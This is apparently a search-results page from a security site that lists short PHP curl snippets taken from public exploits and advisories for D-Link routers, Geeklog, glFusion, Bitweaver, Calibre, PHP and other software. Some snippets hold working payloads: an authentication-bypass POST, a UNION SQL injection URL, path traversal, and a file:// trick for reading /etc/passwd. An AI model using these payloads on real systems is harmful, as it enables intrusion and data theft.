New User, Welcome!     Login

curl setopt($ch

Re: D-Link DIR-300 authentication bypass

   echo "Usage: php5 $argv[0] <router ip addres> <port>
   <admin password>\n";
   exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));

FreeWebshop.org: multiple vulnerabilities

for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid . 
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
$result = curl_exec($ch);
curl_close($ch);
$result = str_replace("\n", "", $result);

Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

    }
     
    function _s($url, $auth, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit

    }
     
    function _s($url, $cmd, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port, $cookie;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit

    }
     
    function _s($url, $ck, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit

    }
        
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        curl_setopt($ch, CURLOPT_HEADER, 1);

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

    }
     
    function _s($url, $ck, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution

    }
        
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        curl_setopt($ch, CURLOPT_HEADER, 1);

RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit

    }
     
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
        }
        curl_setopt($ch, CURLOPT_HEADER, 1);

YVS Image Gallery Sql injection

$target = $argv[1];
$info = $argv[2];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");

glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

        function _s($url,$request)
        {
            global $_use_proxy,$proxy_host,$proxy_port;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7");
            curl_setopt($ch, CURLOPT_TIMEOUT, 0);

ImgPals Photo Host Version 1.0 Admin Account Disactivation

$target = $argv[1];
$power = $argv[2]

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);

[waraxe-2010-SA#077] - Multiple Vulnerabilities in Calibre 0.7.34

-------------------------------------------------------------------------------
<?php
error_reporting(E_ALL);
$url = "http://127.0.0.1:8080/static/../jquery.simulate.js";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($ch);
curl_close($ch);
echo $resp;
?>

D-Link DIR-300 authentication bypass

                echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
                exit;
        }
        $ch=curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_PORT, $argv[2]);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));

SurgeMail v.38k4 webmail Host header crash

        $header ="POST / HTTP/1.0\r\n";
        $header.="Host: $puf\r\n";
        $header.="Connection: Close\r\n\r\n";
      
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

        $data = curl_exec($ch); if (curl_errno($ch)) {

PHP 5.2.9 curl safe_mode & open_basedir bypass

- --- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---
The main problem exist in checking safe_mode & open_basedir for curl functions. There is a difference between checking the access and the implementation of the operations.

Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");

curl in the first place check safe_mode and open_basedir for

"file:////etc/passwd" 
/* realpath is ./file:/etc/passwd */

Zen Cart local file disclosure vulnerability

  ...
                
  // Send CURL communication
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_VERBOSE, 0);

  ...

  $result = curl_exec($ch);


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!